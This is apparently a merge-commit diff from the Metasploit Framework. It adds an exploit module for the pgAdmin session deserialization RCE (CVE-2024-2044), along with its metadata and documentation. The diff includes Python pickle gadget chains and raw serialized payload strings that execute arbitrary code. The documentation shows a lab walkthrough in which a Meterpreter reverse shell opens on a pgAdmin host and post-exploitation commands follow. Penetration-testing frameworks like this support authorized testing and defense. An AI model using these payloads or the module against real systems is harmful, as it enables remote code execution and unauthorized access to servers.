Merge remote-tracking branch 'upstream/master'

Gemfile.lock

@@ -474,7 +474,7 @@ GEM
     ruby-progressbar (1.13.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.3.4)
+    ruby_smb (3.3.5)
       bindata (= 2.4.15)
       openssl-ccm
       openssl-cmac

db/modules_metadata_base.json

@@ -105476,6 +105476,69 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_multi/http/pgadmin_session_deserialization": {
+    "name": "pgAdmin Session Deserialization RCE",
+    "fullname": "exploit/multi/http/pgadmin_session_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-04",
+    "type": "exploit",
+    "author": [
+      "Spencer McIntyre",
+      "Davide Silvetti",
+      "Abdel Adim Oisfi"
+    ],
+    "description": "pgAdmin versions <= 8.3 have a path traversal vulnerability within their session management logic that can allow\n          a pickled file to be loaded from an arbitrary location. This can be used to load a malicious, serialized Python\n          object to execute code within the context of the target application.\n\n          This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials\n          are specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object\n          using pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before\n          being deleted using the file management plugin. This technique works for both Linux and Windows targets. If no\n          credentials are provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a\n          UNC path. This technique only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also\n          requires that insecure outbound guest access be enabled.\n\n          Tested on pgAdmin 8.3 on Linux, 7.7 on Linux, 7.0 on Linux, and 8.3 on Windows. The file management plugin\n          underwent changes in the 6.x versions and therefor, pgAdmin versions < 7.0 can not utilize the authenticated\n          technique whereby a payload is uploaded.",
+    "references": [
+      "CVE-2024-2044",
+      "URL-https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/",
+      "URL-https://github.com/pgadmin-org/pgadmin4/commit/4e49d752fba72953acceeb7f4aa2e6e32d25853d"
+    ],
+    "platform": "Python",
+    "arch": "python",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-04-16 13:36:21 +0000",
+    "path": "/modules/exploits/multi/http/pgadmin_session_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/pgadmin_session_deserialization",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_multi/http/phoenix_exec": {
     "name": "Phoenix Exploit Kit Remote Code Execution",
     "fullname": "exploit/multi/http/phoenix_exec",

documentation/modules/exploit/multi/http/pgadmin_session_deserialization.md

@@ -0,0 +1,94 @@
+## Vulnerable Application
+pgAdmin versions <= 8.3 have a path traversal vulnerability within their session management logic that can allow a
+pickled file to be loaded from an arbitrary location. This can be used to load a malicious, serialized Python object to
+execute code within the context of the target application.
+
+This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials are
+specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object using
+pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before being deleted
+using the file management plugin. This technique works for both Linux and Windows targets. If no credentials are
+provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a UNC path. This technique
+only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also requires that insecure outbound
+guest access be enabled.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/multi/http/pgadmin_session_deserialization`
+1. Set the `RHOST`, `PAYLOAD`, and optionally the `USERNAME` and `PASSWORD` options
+1. Do: `run`
+
+### Installation (Docker on Linux)
+
+A docker instance can be started using the following command. It'll start on port 8080 with an initial account for
+`[email protected]`. Additional accounts can be created through the web UI.
+
+```
+docker run -p 8080:80 \
+    -e '[email protected]' \
+    -e 'PGADMIN_DEFAULT_PASSWORD=Password1!' \
+    -d dpage/pgadmin4:8.3
+```
+
+### Installation (Windows)
+
+These steps are the bare minimum to get the application to run for testing and should not be use for a production setup.
+For a production setup, a server like Apache should be setup to run pgAdmin through it's WSGI interface.
+
+**The following paths are all relative to the default installation path `C:\Program Files\pgAdmin 4\web`**.
+
+1. [Download][1] and install the Windows build
+1. Copy the `config_distro.py` file to `config_local.py`
+1. Edit `config_local.py` and set `SERVER_MODE` to `True`
+1. Upgrade pip:  `..\python\python.exe -m pip upgrade`
+1. Install python package required by `setup.py`:  `..\python\python.exe -m pip install "psycopg[binary,pool]"`
+1. Initialize the database: `..\python\python.exe setup.py setup-db`
+1. Create an initial user account: `..\python\python.exe setup.py add-user --admin [email protected] Password1!`
+1. Run the application: `..\python\python.exe pgAdmin4.py`
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### pgAdmin 8.3 on Docker
+
+```
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RHOSTS 192.168.250.134
+RHOSTS => 192.168.250.134
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RPORT 8080
+RPORT => 8080
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set SSL false
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => false
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set USERNAME [email protected]
+USERNAME => [email protected]
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PASSWORD Password1!
+PASSWORD => Password1!
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PAYLOAD python/meterpreter/reverse_tcp
+PAYLOAD => python/meterpreter/reverse_tcp
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set LHOST 192.168.250.134
+LHOST => 192.168.250.134
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > run
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
+[*] Successfully authenticated to pgAdmin
+[*] Serialized payload uploaded to: /var/lib/pgadmin/storage/zeroSteiner_gmail.com/reiciendis.pages
+[*] Triggering deserialization for path: ../storage/zeroSteiner_gmail.com/reiciendis.pages
+[*] Sending stage (24768 bytes) to 192.168.250.134
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.134:45930) at 2024-03-29 12:01:04 -0400
+
+meterpreter > getuid
+Server username: pgadmin
+meterpreter > sysinfo
+Computer     : 27b165126272
+OS           : Linux 6.7.9-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Mar  6 19:35:04 UTC 2024
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > pwd
+/pgadmin4
+meterpreter > 
+```
+
+[1]: https://www.postgresql.org/ftp/pgadmin/pgadmin4/v8.3/windows/

external/source/python_deserialization/py3_exec.py

@@ -0,0 +1,9 @@
+import pickle
+
+class GadgetChain:
+    def __reduce__(self):
+        return __builtins__.exec, ('#{escaped}',)
+
+if __name__ == '__main__':
+    pickled = pickle.dumps(GadgetChain(), protocol=0)
+    print(repr(pickled.decode()))

external/source/python_deserialization/py3_exec_threaded.py

@@ -0,0 +1,14 @@
+import pickle
+import threading
+
+class CreateThread:
+    def __reduce__(self):
+        return threading.Thread, (None, __builtins__.exec, None, ('#{escaped}',))
+
+class GadgetChain:
+    def __reduce__(self):
+        return threading.Thread.start, (CreateThread(),)
+
+if __name__ == '__main__':
+    pickled = pickle.dumps(GadgetChain(), protocol=0)
+    print(repr(pickled.decode()))

lib/msf/core/exploit/remote/smb/server/share.rb

@@ -99,7 +99,7 @@ def get_file_contents(client:)
       end
 
       def cleanup
-        self.service.remove_share(share) if share.present?
+        self.service.remove_share(share) if self.service.present? && share.present?
 
         super
       end

lib/msf/util/python_deserialization.rb

@@ -6,11 +6,17 @@ module Util
     # Python deserialization class
     class PythonDeserialization
       # That could be in the future a list of payloads used to exploit the Python deserialization vulnerability.
+      # Payload source files are available in external/source/python_deserialization
       PAYLOADS = {
         # this payload will work with Python 3.x targets to execute Python code in place
         py3_exec: proc do |python_code|
           escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
           %|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
+        end,
+        # this payload will work with Python 3.x targets to execute Python code in a new thread
+        py3_exec_threaded: proc do |python_code|
+          escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
+          %|c__builtin__\ngetattr\np0\n(cthreading\nThread\np1\nVstart\np2\ntp3\nRp4\n(g1\n(Nc__builtin__\nexec\np5\nN(V#{escaped}\np6\ntp7\ntp8\nRp9\ntp10\nRp11\n.|
         end
       }
 

modules/exploits/linux/http/ipfire_proxy_exec.rb

@@ -25,7 +25,7 @@ def initialize(info = {})
         'References'  =>
           [
             [ 'EDB', '39765' ],
-            [ 'URL', 'www.ipfire.org/news/ipfire-2-19-core-update-101-released']
+            [ 'URL', 'https://www.ipfire.org/news/ipfire-2-19-core-update-101-released']
           ],
         'License'        => MSF_LICENSE,
         'Platform'       => 'unix',